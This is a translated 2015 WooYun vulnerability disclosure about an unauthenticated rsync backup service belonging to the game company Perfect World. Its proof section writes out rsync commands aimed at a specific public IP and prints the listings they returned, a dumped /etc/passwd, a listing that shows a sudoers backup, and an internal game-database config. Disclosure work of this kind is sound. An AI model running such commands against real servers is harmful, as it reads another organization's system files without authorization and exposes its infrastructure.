
Vulnerability summary

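Bug ID: wooyun-2015-0138199

Title: Unauthorized access to a Perfect World rsync service exposes a large amount of sensitive information

Vendor: Perfect World (完美世界)

Author: 星明月稀

Submitted: 2015-08-31 17:19

Fixed: 2015-10-15 19:44

Disclosed: 2015-10-15 19:44

Vulnerability type: Unauthorized access / permission bypass

Severity: Medium

Self-assessed Rank: 10

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]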



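Vulnerability details

Disclosure status:

2015-08-31: Details sent to the vendor; awaiting vendor handling
2015-08-31: Vendor has confirmed; details disclosed to the vendor only
2015-09-10: Details disclosed to core white hats and experts in related fields
2015-09-20: Details disclosed to regular white hats
2015-09-30: Details disclosed to trainee white hats
2015-10-15: Details disclosed to the public

Brief description:

Unauthorized access to a Perfect World rsync service exposes a large amount of sensitive information

Detailed description:

Same issue on the same network segment: WooYun: Unauthorized access to a Perfect World (完美时空) rsync service leaks a large volume of game data backups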

rsync --old-d 58.215.52.90::backup/
drwxr-xr-x 4096 2015/07/29 08:20:21 .
-rw-r--r-- 71 2011/05/19 14:06:27 addsudo.txt
drwxr-xr-x 21 2012/06/13 14:54:29 apptools
drwxr-xr-x 4096 2015/07/29 08:20:22 backup
drwxr-xr-x 4096 2011/05/31 08:16:05 beiji
drwxr-xr-x 4096 2015/08/05 00:34:29 cashstat
drwxr-xr-x 100 2010/12/14 03:40:02 cricket-data
drwxr-xr-x 4096 2015/07/29 08:20:22 database
drwxr-xr-x 4096 2015/08/05 15:02:58 game1
drwxr-xr-x 37 2015/07/29 08:20:23 link2
drwxr-xr-x 4096 2015/08/31 04:03:03 logs
drwxr-xr-x 118784 2015/08/05 06:02:18 market
drwxr-xr-x 6 2010/12/23 11:41:19 monitor
drwxr-xr-x 4096 2013/07/16 14:32:30 nuofu
-r--r----- 5245 2011/05/18 10:35:01 sudoers.bak
drwxr-xr-x 4096 2015/08/05 00:40:56 tmp
drwxr-xr-x 54 2015/08/04 18:05:01 web


Proof of vulnerability:

A backup of an entire Linux system directory tree:

rsync --old-d 58.215.52.90::backup/database/
drwxr-xr-x 4096 2015/07/29 08:20:22 .
-rw-r--r-- 0 2015/02/25 15:20:13 .autofsck
drwxr-xr-x 4096 2011/12/06 04:02:12 bin
drwxr-xr-x 17 2010/04/29 21:47:45 boot
drwxr-xr-x 6 2010/05/04 20:30:09 dbf
drwxr-xr-x 62 2010/04/29 20:02:27 dev
drwxr-xr-x 4096 2015/08/27 04:02:03 etc
drwxr-xr-x 19 2012/12/06 15:29:22 home
drwxr-xr-x 6 2005/02/22 08:57:49 initrd
drwxr-xr-x 8192 2015/08/27 04:02:03 lib
drwxr-xr-x 6 2005/02/22 08:57:49 media
drwxr-xr-x 6 2005/02/22 08:57:49 mnt
drwxr-xr-x 6 2005/02/22 08:57:49 opt
drwxr-xr-x 6 2010/04/29 17:19:06 proc
drwxr-xr-x 4096 2015/07/29 08:20:11 root
drwxr-xr-x 4096 2012/03/13 04:02:05 sbin
drwxr-xr-x 6 2010/04/29 17:19:05 selinux
drwxr-xr-x 6 2005/02/22 08:57:49 srv
drwxr-xr-x 6 2010/04/29 17:19:06 sys
drwxrwxrwt 4096 2015/08/05 06:02:01 tmp
drwxr-xr-x 4096 2014/06/04 15:05:16 usr
drwxr-xr-x 4096 2010/04/29 21:43:04 var


etc/passwd

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
pagent:x:500:500::/home/pagent:/bin/bash


backup/database/root/gamedbd/cashstat.conf

[GameDBClient]          
type = tcp
port = 29400
address = 172.16.2.117
so_sndbuf = 16384
so_rcvbuf = 16384
ibuffermax = 1048576
obuffermax = 1048576
;so_broadcast = 1
tcp_nodelay = 0
accumulate = 268435456
zoneid = 14
[storage]
homedir = ./dbhome
datadir = dbdata
logdir = dblogs
backupdir = ./backup
cachesize = 16777216
errpfx = Storage
checkpoint_interval = 300
backup_interval = 86400
[storagewdb]
homedir = ./dbhomewdb
datadir = dbdata
logdir = dblogs
backupdir = ./backupwdb
checkpoint_interval = 60
times_incbackup = 1
tables = auction,city,equipment,friends,messages,status,user,auctionindex,clsconfig,factioninfo,inventory,rolename,storehouse,userfaction,base,config,factionname,mailbox,sellpoint,task,translog,waitdel,gtask,order,shoplog,syslog,userstore,webtrade,webtradesold,serverdata,factionfortress,factionrelation,force,friendext,globalcontrol,crslogicuid,rolenamehis,kingelection,playershop,weborderitem,playerprofile,uniquedata,recalluser,mappassword,solochallengerank,mnfactioninfo,mnfactionapplyinfo,mndomaininfo,mndomainbonus
cache_high_default = 8000
cache_low_default = 7500
;base_cache_high = 50000
;base_cache_low = 45000
;status_cache_high = 50000
;status_cache_low = 45000
;inventory_cache_high = 50000
;inventory_cache_low = 45000
;task_cache_high = 50000
;task_cache_low = 45000
backup_lockfile = /tmp/.lockgamedbd
quit_lockfile = /tmp/.quitgamedbd

Remediation:

Add authorization.

Copyright notice: please credit the source when reposting: 星明月稀@乌云


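Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2015-08-31 19:42

Vendor reply:

Thank you to the reporter for your attention to Perfect World; we will patch this as soon as possible.

Latest status:

None yet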